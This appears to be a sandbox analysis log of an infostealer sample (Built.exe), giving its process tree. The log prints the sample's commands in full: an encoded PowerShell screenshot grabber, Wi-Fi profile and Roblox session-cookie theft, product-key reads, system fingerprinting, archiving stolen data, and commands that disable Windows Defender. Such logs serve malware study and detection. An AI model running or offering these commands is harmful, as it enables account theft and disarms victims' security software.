  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:684
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:5100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:2240
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:3224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:4784
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3696
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\psqliode\psqliode.cmdline"
        5⤵
        
        PID:3124
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCEF8.tmp" "c:\Users\Admin\AppData\Local\Temp\psqliode\CSC1903012BADC74167AA522EAC4D2D3058.TMP"
        6⤵
        
        PID:2224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:224
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:5072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2880
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4452
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3104
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2340
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4416
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3936
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2992
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1304
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:1576
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:4864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI49442\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\8OR2v.zip" *"
    3⤵
    PID:4748
  - - C:\Users\Admin\AppData\Local\Temp\_MEI49442\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI49442\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\8OR2v.zip" *
      4⤵
      Executes dropped EXE
      PID:4416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:2928
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:5068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:1416
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:1672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3864
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:228
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4060
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:2384
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4528

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4256

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1204
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd858ccc40,0x7ffd858ccc4c,0x7ffd858ccc58
  2⤵
  PID:4700
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1816,i,14683496129876264270,10232415643246367867,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1812 /prefetch:2
  2⤵
  PID:384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2100,i,14683496129876264270,10232415643246367867,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2104 /prefetch:3
  2⤵
  PID:1576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2176,i,14683496129876264270,10232415643246367867,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2192 /prefetch:8
  2⤵
  PID:1020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3068,i,14683496129876264270,10232415643246367867,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3240 /prefetch:1
  2⤵
  PID:5048
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3124,i,14683496129876264270,10232415643246367867,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3276 /prefetch:1
  2⤵
  PID:5040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3076,i,14683496129876264270,10232415643246367867,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4456 /prefetch:1
  2⤵
  PID:3728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4760,i,14683496129876264270,10232415643246367867,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4768 /prefetch:8
  2⤵
  PID:3828
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4924,i,14683496129876264270,10232415643246367867,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4816 /prefetch:8
  2⤵
  PID:1380
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4940,i,14683496129876264270,10232415643246367867,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5088 /prefetch:1
  2⤵
  PID:3040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4424,i,14683496129876264270,10232415643246367867,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4740 /prefetch:1
  2⤵
  PID:2072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5240,i,14683496129876264270,10232415643246367867,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3776 /prefetch:1
  2⤵
  PID:2528
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5432,i,14683496129876264270,10232415643246367867,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3428 /prefetch:8
  2⤵
  PID:3480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3436,i,14683496129876264270,10232415643246367867,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3456 /prefetch:8
  2⤵
  PID:4052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3316,i,14683496129876264270,10232415643246367867,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5060 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  PID:1340
- C:\Users\Admin\Downloads\Built.exe
  "C:\Users\Admin\Downloads\Built.exe"
  2⤵
  - Executes dropped EXE
  PID:3604
- - C:\Users\Admin\Downloads\Built.exe
    "C:\Users\Admin\Downloads\Built.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3820
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Built.exe'"
      4⤵
      PID:1600
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Built.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2428
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      PID:2432
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
